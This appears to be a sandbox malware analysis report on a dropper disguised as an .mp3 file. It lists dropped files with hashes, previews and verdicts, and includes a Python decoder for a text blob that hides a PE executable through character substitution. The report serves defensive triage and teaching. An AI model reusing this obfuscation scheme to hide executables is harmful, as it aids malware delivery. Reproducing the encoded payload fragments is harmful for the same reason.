                                              Preview:49pWmAv4tOE436P02w6j841y8m4123W4P531ae6TkIK96G0t5T5m1487lyGEt9U56cnk01T7Dgm3Xs53PK3i571cI606b3o719B..FontConstants ToolbarConstants..690v95P8h87W7PV1u0p8ZKv25l5652Rv1T23ac8341Bz08A4K993a0NO2I2x72m22t1jsXMMVz25olS10260A709K8D347VY0iCC1c8A863H3K6U91m4oH3tfKlz3Pm1o63..FileConstants ColorConstants..Tts32nk..ToolbarConstants FileConstants..gA1qgpj4F9r8Qx72ZjiS3R88GD1v2089pQZ838Xwf7e2A1ZNE2q841NrN3o71q89NYj5w26F92E23KW5a773o4cCln6R912E32262lr47T6U83u703677039Ckd0YR8zek886aze1hgmm2qL76OuA2O61..FileConstants ComboConstants..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):586
                                              Entropy (8bit):5.585544499923843
                                              Encrypted:false
                                              SSDEEP:12:SCsCEhjB3FzAduE13Ozk0L4d3VNXINdzzPXbWWC6pZBPc:7sCwjB3addBOQgSFNXUeWCUZO
                                              MD5:AC53EE172CC20F1BC979FD4710CBFA00
                                              SHA1:5C83524E42270883FF05C434F3AB62ADA8931F51
                                              SHA-256:774C4CC458E33020B29FA28FC91DB540C86F55142D716CA1613DA20670435198
                                              SHA-512:70DF2BFE2300AAE5BEC804E7F0235C1B9601FC1447DF84248B6EFF030A4F36B908D00D089911D082C7CA10F7F9D30239B1414B754B32CB1ADC8F8A5A7286341D
                                              Malicious:false
                                              Preview:2KnAS42t0717CtE86wxw1eBx6M9m00LhKgjL7bTv87b697..ComboConstants FileConstants..8P338lYn1Lz17O1D1m17ZDA76b61qv0r28HOQr81eq944h4r5YGvr1zd61csiM931f388i2IVdp90HFXW3ey05ttx8zd01l619Yo4pw7yYC76u25908Kq314r0jCE0fi4g8CS3u6OQIc0LN38983kx68kadwbRxr7I583x4PN532O..ComboConstants ButtonConstants..4l527imF4dR4CpFQ4uanrzi94h447ild095turzb786nr57N5T6SQ1n49lU2847ncDSW982Ze9w44X81F2fN6E9M483aQOx4t81N1plRMm4XI95..DateTimeConstants FileConstants..IUnPzxKt9I79R82mLPBf..ToolTipConstants DateTimeConstants..2w611G817F9vxhnVW19MGSBi4S1K8e7bo70h8eRFN17V22AV0Mc4195r928F2o..FontConstants TreeViewConstants..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):588
                                              Entropy (8bit):5.744612228806984
                                              Encrypted:false
                                              SSDEEP:12:WnGNeRd/MUAwEhQmHIFFg33etq6gFodFgSRRhkbkNkt7HLzYmv:WGuNW3F6gKdbRhkANo7LFv
                                              MD5:62A55B40D10BC4CCDF643E624B90D003
                                              SHA1:1AAFD527E1B40B555B1E68E1F6D9F6C594586913
                                              SHA-256:9401C3D0CBD1FBB5FB740EA9EFF7B4F7AF764574A6CBC487C97F99F610BA9852
                                              SHA-512:421B3694A2F2E080A03459973FE05A2B23F4FA67323529EE8D9AFDB6B5E9B8D082193A31F7C2B58D3368158FCDEF49D60DBABD3A4F7E656C8ED5B3B95F6BB181
                                              Malicious:false
                                              Preview:oG03pyV354095sGOBRSxx20ZkLDzgY1775f31..ToolTipConstants ToolbarConstants..5AE68g00h7FK7mS7D5oHX0Lg8zcqiE249..DateTimeConstants ComboConstants..k57l9IlHJ6Hh6kaM165f2r455631vlPUD4wvcv2i629945oX3yonmwYJ1ZQ3b9k3A85hVvvLO5932kA786Ho2cf8JpWF9O1Q49JJA3Ry253M82g81F28908fYJ964H3322rp..FontConstants GuiDateTimePicker..gp2P204LuYXL53MN080949vc11DjMN2f1Wi5fW1W3UKCA7x0tWx304A5VA2469d991L4N0358t0PFRN7a0j66K2Mk6T7KP62w1Y1sor6ycoZ17zj7V7YZj9..ToolTipConstants StructureConstants..1SUK6H2348154QFlh2zLMU4A7Ah05AVSQ1d53d9q7azA312Su8qL0QLZJVRE4U18bPc4cpd5Wr07g2g6Y..GuiDateTimePicker GuiDateTimePicker..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                              Category:dropped
                                              Size (bytes):1373192
                                              Entropy (8bit):4.041168214657541
                                              Encrypted:false
                                              SSDEEP:24576:T3AoJ3FFp2KHP5jD69JE4N325yEqwGxRtsb+r:LACYDNf1F
                                              MD5:35A5CC0E4D021890E72A070EE02DFDC4
                                              SHA1:BA20DE52CDC21E3D8BD69470381B7D0CB53F1D05
                                              SHA-256:51E725C19B88D14E3D978B54D810398993242C959145F323FDE92CFA55557ADA
                                              SHA-512:AFE5510B3A27CF5E308CDE1E000289777AB9CFD592052B37C990028F51F4D5113E15FCCF7B13CF9A13ED06E3D134ED2009BBD18DDD5B508FA20D050D8D2719C2
                                              Malicious:false
                                              Preview:0x4D5*9]]3]]]04]]]FFFF]]_8]]]]]]]4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]08]]]]E/F_*0E]_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0*24]]]]]]]5045]]4C0/03]5E7_5F64]]]]]]]]E]]20/0_0/0_]]3]*]]66]]]]]]EE4E0*]]2]]]06]*]]]4]]02]]]]2]]04]]]]]]]04]]]]]]]]]0_]]02]]]]]]02]4085]]/]]0/]]]]0/]]0/]]]]]]0/]]]]]]]]]]]0944E0*]57]]]]6]*]/863]]]]]]]]]]]]]]]]]]]E]*]0C]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]2]]]8]]]]]]]]]]]082]]048]]]]]]]]]]]2E74657874]]]F42E0*]]2]]]03]*]]02]]]]]]]]]]]]]]2]]0602E72737263]]]/863]]]6]*]]64]]]320*]]]]]]]]]]]]]4]]0402E72656C6F63]]0C]]]]E]*]]02]]]960*]]]]]]]]]]]]]4]]042]]]]]]]]]]]]]]]]D04E0*]]]]]48]]]02]05]D43D0*]C0/]]]/]]]04]]06*827]]2*/60*]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]/33]5]0502]]0/]]//]7E0E]]0*0*037E0E]]0*280F]]0*2C0604/6FE0/2_0//7]/3/0///03*D80/]]]04E08D/3]]0/0_73/]]]*0C0307/60428//]]0*]04/F/05E/6FE0//6FE0//3/0///03*F4]]]]/F/08D/3]]0/0D/F/08D/3]]0//30473/2]]0*/3057E0/]]04/E//04/6/F/028/3]]0*]7E0/]]0
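The 1,373,192-byte file above is typed by the sandbox as plain ASCII with no line terminators, but its preview is a hex dump of a PE with four characters swapped in. Lining "0x4D5*9]]3]]]04]]]FFFF]]_8..." up against a normal DOS header (4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 ...) gives ']' = "00", '*' = 'A', '_' = 'B' and '/' = '1'; the same table turns "546869732070726F67726/6D..." into "This program", and further into the preview "2E74657874", "2E72737263" and "2E72656C6F63" are the section names .text, .rsrc and .reloc. The decoder below is an added example written for this page, not code from the report or from the dropper. The substitution table is an inference from the preview alone (the full file was not examined), so the decoder rejects any character outside the table instead of guessing, and the embedded sample is a constructed copy of the preview's opening.

```python
import struct
from datetime import datetime, timezone

# Substitution table inferred here by aligning the preview text against a
# normal DOS/PE header (an assumption; the dropper's own decoder was not
# examined). ']' expands to a zero byte, which is why the file is mostly runs
# of ']' and why 1.37 MB of text holds a smaller binary.
SUBST = {"]": "00", "*": "A", "_": "B", "/": "1"}
HEX_DIGITS = frozenset("0123456789ABCDEF")

# Constructed sample: the opening of the preview above, copied verbatim except
# that the long ']' runs are written as "]" * n with the same n as the preview.
SAMPLE_PREVIEW = (
    "0x4D5*9]]3]]]04]]]FFFF]]_8" + "]" * 7 + "4" + "]" * 35 + "08]]]]"
    "E/F_*0E]_409CD2/_80/4CCD2/"
    "546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53"
    "206D6F64652E0D0D0*24" + "]" * 7
    + "5045]]4C0/03]5E7_5F64" + "]" * 8
    + "E]]20/0_0/0_]]3]*]]66" + "]" * 6
    + "EE4E0*]]2]]]06]*]]]4]]02]]]]2]]04"
)


def decode_blob(text):
    """Expand the substitution and return raw bytes.

    Characters outside the table raise: silently skipping one would shift every
    later nibble and turn the rest of the image into noise.
    """
    if text.startswith("0x"):
        text = text[2:]
    parts = []
    for ch in text:
        if ch in SUBST:
            parts.append(SUBST[ch])
        elif ch in HEX_DIGITS:
            parts.append(ch)
        else:
            raise ValueError(f"unexpected character {ch!r}; substitution table incomplete")
    hexstr = "".join(parts)
    if len(hexstr) % 2:          # a truncated preview may end mid-byte
        hexstr = hexstr[:-1]
    return bytes.fromhex(hexstr)


def parse_pe_header(data):
    """Return the fields a triage pass checks first; raise if the bytes are not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ signature: wrong table or not a PE")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _symptr, _nsyms, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                                  # PE32: 4-byte ImageBase at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:                                # PE32+: 8-byte ImageBase at +24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    return {
        "e_lfanew": e_lfanew,
        "machine": machine,                             # 0x14C = i386
        "sections": nsections,
        "timestamp": timestamp,
        "timestamp_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).isoformat(),
        "size_of_optional_header": opt_size,
        "characteristics": chars,
        "magic": magic,
        "size_of_code": struct.unpack_from("<I", data, opt + 4)[0],
        "entry_point": struct.unpack_from("<I", data, opt + 16)[0],
        "image_base": image_base,
    }


def triage(text):
    """For a dropped-file sweep: header dict if the text decodes to a PE, else None."""
    try:
        return parse_pe_header(decode_blob(text))
    except (ValueError, struct.error):
        return None


if __name__ == "__main__":
    for name, value in parse_pe_header(decode_blob(SAMPLE_PREVIEW)).items():
        print(f"{name:>24}: {value:#x}" if isinstance(value, int) else f"{name:>24}: {value}")
```

Run on the full dropped file it recovers a PE that can be hashed and compared against the executables listed elsewhere in this report. The small text files whose previews mix random tokens with AutoIt include names contain lowercase letters, so triage() returns None for them; that is the intended negative case, and a real sweep should treat any other rejection as a sign the substitution table is incomplete rather than as proof the file is benign.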
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):579
                                              Entropy (8bit):5.575049796233503
                                              Encrypted:false
                                              SSDEEP:12:SgIrV55RKAnZROwTEeZUCeyNsLrkW6GLr1uQRTPUUD2EdZ:SgAVJKAnvOmUCXW63x0dZ
                                              MD5:E3C40D261A890A50E8616EFBCE725DF6
                                              SHA1:51087DD64E5C3F673C47A3B03CCAFFADB77DCE6D
                                              SHA-256:A1C8B7A1408638A385956EDAAF4EC1DEFB98E94784A5AEAEC9F63FD24CF3F83B
                                              SHA-512:114DE87085139632A912F2BDC2700EB60F166623641C460E818CE7A29EDC2DAC24F9C01B186CFB268976B7605FE496ADDB4300E6EC20507B101659DF2ADD69F8
                                              Malicious:false
                                              Preview:1q61d1LIRu9L98NY7g323ffUm3N34OA9b053foF9228QB26bH7GMa619r0PWWN42j2tR2D8hEkgK7K3vp3hK6080P3n9XyR9V69p7q4ya3IMz6Ok3K41x047vk8e1E1Qn8670H249S28L6tVE20q25S..DateTimeConstants FontConstants..773z76rS6Hr23O8rI30j7eMY3Q3Q7I021atLf93l986mx1e2aZfh09Vpp3s54t8IHY8Va2Hhd8X02KGU4C475coy2wtf84vyn7ZqKXjp3pQtW0vz31xO35lT602945i5Xji30Kd0514wp2A331oT29L3..UpDownConstants ToolbarConstants..9GYWl382o1858qz9x8zk6b6093C9O95Ze6aDdI00zo1V306x40c02010258A0HhwBd1L64l395I5d3fd3C..TreeViewConstants FontConstants..T1X2c09SB0w75y286D20W8G19PHF93019HTC4M34bL843I8I0439nH..UpDownConstants ComboConstants..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):5.547696645967649
                                              Encrypted:false
                                              SSDEEP:12:EBPfOBVX8y2PB4kT4DrgUyYSb2ElZhbuQ7+UNjTpP7:EpyXj2PG64zyfqEtbum+GjTp
                                              MD5:C4CEA733EF0F8C84E8C7081CDCB01B5E
                                              SHA1:66050A0F1A5C5A17532E8D449573A31BE8E8C693
                                              SHA-256:B75166289CC3ACD2E7ECB722F91792CEAD7BCCBE5D230A3AAF211C2027F7E8B4
                                              SHA-512:013A885C743CAE8BC941D76374745D18498CF5F53AEB7C4E02232130A552CC1553C2D3051D85B0494033DA2F5367BA078333659823A7AC236254420EEA0706DA
                                              Malicious:false
                                              Preview:TLR8ELL28..FileConstants TreeViewConstants..A8376Bzc32B160o57k9hBRD5it3w253kAQ5o8v8k9u12nbIk38u3UBQptw0159Wr3it64GO8p7rPNpN0GuFo1719IA059hr10X646..DateTimeConstants ColorConstants..SF1cuZHEA..ToolTipConstants DateTimeConstants..R355Bk4pweAC3JaG5aYh2oi1sFLSG1Vb4WuL047TC9Z01470m5KDs7YDFZZI2q35324Y11703B1734C73vNft25c5Z8Rg3j52gKd26D767Y6qz14Z322h9aJ2lInD369BHe115PTy21e5T3o4hA8ZCnV32wFu8g..ButtonConstants GuiDateTimePicker..648a97EKj9QK1164PH7tl5198sikWF150Q76E7k1KK1Z15Bke0M9..TreeViewConstants ComboConstants..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):562
                                              Entropy (8bit):5.564214025056381
                                              Encrypted:false
                                              SSDEEP:12:pkxSfmKryTM4h6LyEeTNKjGbrGh9VAfwv:pk2mK2TM4oLyEeTgjG3Gh3Afwv
                                              MD5:4C854C21A4E83906AF7AE0B83D1D797B
                                              SHA1:52A423C95344186D45C66780CD55890820E755E0
                                              SHA-256:613C53A8E742366747A9253DD19FAB2527258F08E40699AAAB85D920787A717B
                                              SHA-512:BFEA86080CFFEC1E69EC7F5A1371796A656B8A129A1FEF437FADC8D170CDFD07C6F1BA514FCD14A138D943D89E26621686C366592D9BF6890C83C22A0EFA1963
                                              Malicious:false
                                              Preview:NZ8518kVp3k5h34470sFP55f2z7YD9PrLOE8xR5VK3yay14o..ToolTipConstants ToolTipConstants..1V7q7875S627zc33y98D452je07S62dN4eYoxE5PT6..UpDownConstants ToolbarConstants..rk3o03aO59012kV560TKOL428RABj694W77Zty10nXEJ71t0r7y74Sn3m7cE94W4UrQ00Yz9W85u93H9k5w5uCe0kc5135560kQ80929mH5443KY445p48Yhw..ButtonConstants DateTimeConstants..72ts5u93Icg055NGVnfs12sL6R98Q9u07Sqp09z3rf4G4fg2k8uSIXQuQi385I6a5826RJeh9Gnep1T7t5U5d3ki8y08v0cZ..ToolTipConstants ToolbarConstants..004n5gvFO4r501107u278V9PibNPXDe238mQ5y05V6i21L9yc03U23i18bYF9Uz10KsEA89..ButtonConstants GuiDateTimePicker..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):648
                                              Entropy (8bit):5.642286506031062
                                              Encrypted:false
                                              SSDEEP:12:2y3xfr0t79gqcHuINsJMOrkGgOn1BBaS5GxEu7Femjt/tON9v:v3xfY79gqcHuINsLfgaNGx4m29v
                                              MD5:135F39E327B474DFCF9139F5A9DE5A9B
                                              SHA1:0D70AFD4762C1296355DD9E7579EB57B833D4C0C
                                              SHA-256:0988FF10C9F291F32009CA04929C0156A0E10C5003D30AE266B865E56C064B17
                                              SHA-512:4CD5747C41EF013C5CC884536864C35C45BEEB3FBB794CA6CD891C1F787ACE6A261A0B2E45BBC87677CF6540E5413564D98C2510EE30EC163E8EE3D0E4863E2B
                                              Malicious:false
                                              Preview:TVw8m1vjG6CwK486C1178I0777077425f2zk335753sZFo580ehI3CYyx34I61..ToolbarConstants ToolbarConstants..2cI1Sw6VzV04jfGb2cD97235S1LFzx4FUp6YI907F0T3ECGs6313P747VEs0j7607g1209P1qO37unPA2Ee4lb8t16K02L91a9138i08y1x3p831S9P3E3u4C42rnUiE7J3187KT9zFQ82s4f76R8rO..BorderConstants GuiDateTimePicker..75Z2ug1P65tyHXxmbN6r49hh17t8FFKaTJZ3V129BT3o5K745aMXB2090..ToolTipConstants DateTimeConstants..16I9Q0ZFkx9L6Bz9jk8473aaAS2j9749W42Fgv4s8DI7D6LkO00WC6lk830v0r2y4U190fdr7..ColorConstants GuiDateTimePicker..i1p86J2Y5I7Rbuq7b1EQ4mgiI4K8l1Qd91S381JFJO2HiY5550C7Zi6AL7h529940V3Oz453np94cG4Z19963H451a93lJ9Pi0nK3km9ib5X059TNQa8A6q..ToolbarConstants GuiDateTimePicker..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):633
                                              Entropy (8bit):5.515639729376305
                                              Encrypted:false
                                              SSDEEP:12:Zl70KyLGUkXx+LCaXWKbjy6MGdqNomuLutX/1iBPR6FoCWLqywLHQcs2:gKyLGdX+DXZy6MGdmomuLuJ1ijyWLBM
                                              MD5:0E969295487775DAA7D03B33829684F8
                                              SHA1:613CF0518A258CE3ED5BB2AAC7BAC1FDA71B1EC4
                                              SHA-256:5BADEFDF6C9490D5ED3A5181BB87A30536776827BF7A155957C62B01028FD4FB
                                              SHA-512:7EFCFCEE6E15AF372A6A57F66531FEB1C1873DC22399CE05228369EE3E7E49D69453D75D78131D50217761539BFCE82245140163C50ABAFA1790EEC69F1665E1
                                              Malicious:false
                                              Preview:2k32t5192X8H0KyMR9T20BwJt744c6l26dF9Zo..ToolTipConstants FontConstants..P3Ff6sU5M322sz79T9m6..FileConstants DateTimeConstants..92I1xJd87942g987X7351vdK8411g513yqH8yB263Wn262B3B3150U56mTxXT3V192X808F7uW78Kr5T8t5147sW3CL012z088cq9Jw..FileConstants FontConstants..3m366r1KqTV6qb24..UpDownConstants ButtonConstants..o59Xrz90Xo..ButtonConstants GuiDateTimePicker..2yX62fa6C55b477x097d8WuJU1R264jxF418928662YBke5Y544m0D7U76Z5BX1v84QKpaPZL..ComboConstants TreeViewConstants..z2g24NI1xo99Ngjhf5dc950x5D7jaSFHF2VY6nk2965pY2D8zYa9ak165Z1V9Q90DQ1703w7BGrs9LKw50Ah76rmOF231DfM36Bdx4qBCw7c47szZ6a7SE5I955qD4DU..DateTimeConstants ButtonConstants..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):947288
                                              Entropy (8bit):6.629681466265794
                                              Encrypted:false
                                              SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                              MD5:0ADB9B817F1DF7807576C2D7068DD931
                                              SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                              SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                              SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):947288
                                              Entropy (8bit):6.629681466265794
                                              Encrypted:false
                                              SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                              MD5:0ADB9B817F1DF7807576C2D7068DD931
                                              SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                              SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                              SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):947288
                                              Entropy (8bit):6.629681466265794
                                              Encrypted:false
                                              SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                              MD5:0ADB9B817F1DF7807576C2D7068DD931
                                              SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                              SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                              SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (392), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):90504
                                              Entropy (8bit):3.021449759435307
                                              Encrypted:false
                                              SSDEEP:24:QRMMMMMMMMMMMUYeeeeeeeeeeeeeeeeeeeeeeeeeaYdddddddddddddddddddddJ:bHXI7WPxVcWVWC9EnIhnrQ
                                              MD5:BE932D231EF60DCF6AD6C579873B550C
                                              SHA1:CA37AE517C7D341E008CBD71BEAB29ACA839002C
                                              SHA-256:D47ED1047E043162E221D1A21B5E19D8A24641442BCB17C6C8A51F9456998751
                                              SHA-512:21385ADA5436112899AAA4651A6D561499735E6E59674258C9DE6B38A50E671276AE9E8B5C7F70E60321CF41846AE34E299D179FBF6226027D9A9C99751AD09B
                                              Malicious:false
                                              Preview:..T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.T.e.l.e.V.r.a.m.(.1.3.0.).:.....T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.m.(.1.0.5.).:.T.e.l.e.V.r.a.
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):609
                                              Entropy (8bit):5.517312307798012
                                              Encrypted:false
                                              SSDEEP:12:UIVldnzxwXVoUbApRq1RfoSbdLjPlruYpdMQ2DuyX4Ozjc:UIVrzArKSRjbdLpruYp6LVXhc
                                              MD5:834D7436B1908047FBC4801E3D9EA735
                                              SHA1:8CC6441F6A4A65902AE20C8D0D73A59048227253
                                              SHA-256:056D4C251DE76715737124CCB63E6652840EE3EE66A41F45B109B3F413EE864B
                                              SHA-512:EFFC86EF8949E1C231F9C18C807AFC39882CAFA2BEB5E87F10E2AC5D8378D2F2AC3C94679EEFCFE9F4AF6C260E524BAC051FC789D147215CCD552A1D44EDAE7A
                                              Malicious:false
                                              Preview:f50235..ColorConstants FileConstants..352950q81ZrVFh028w23smi5ASTD3t45Ct47b4Fw158ndgMh3K8m85EiwUL2u71BM7lZtO224PpgS..DateTimeConstants ToolbarConstants..7I140n089014u589NkB234fraO117t2bUc22235..ButtonConstants StructureConstants..051t2ZNexB6gD177M3wL7DwCP9fyN9IObJ13veie35ZCH8hkXq072r3E65..UpDownConstants GuiDateTimePicker..0HA4463l63225A30l7V..TreeViewConstants ButtonConstants..2165..FontConstants GuiDateTimePicker..17cPgv6Fdp776612952eHNUp781420VTI8W983PRn00cpvD43sshTf0Ie6qdFaB2bhPVHJN14687h1QD9ZM6h26971hH5rc938Z7D60g585q20VD24BhB05L626UeS525S18lCuvmC7PZKb9k7MHy..GuiDateTimePicker StructureConstants..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):113665448
                                              Entropy (8bit):6.924457735552897
                                              Encrypted:false
                                              SSDEEP:196608:Gt8gSuolgztogeon51s+rCBTHJVUdOHtBJagqthtgE/zBACLTxLun176fzoEh+To:M
                                              MD5:BD375FCAB430AB12BBE70CFFB392EE88
                                              SHA1:E7E5B1703F84C7ECF79E1F2F0F425FC084F1D215
                                              SHA-256:DE5DC11F91E1F382D44EA0CFD15983680CD2A9239882672C003EB7DA281F5218
                                              SHA-512:EAE4BF46DF8BEA8F9B0C4E028BDE510AFBB12A9BFB9709E5271848D4C9AB38879B987F6DCABE4B0DE7536A481F368A2EF516295C443BAEAAE8E3C2780C9C9F30
                                              Malicious:false
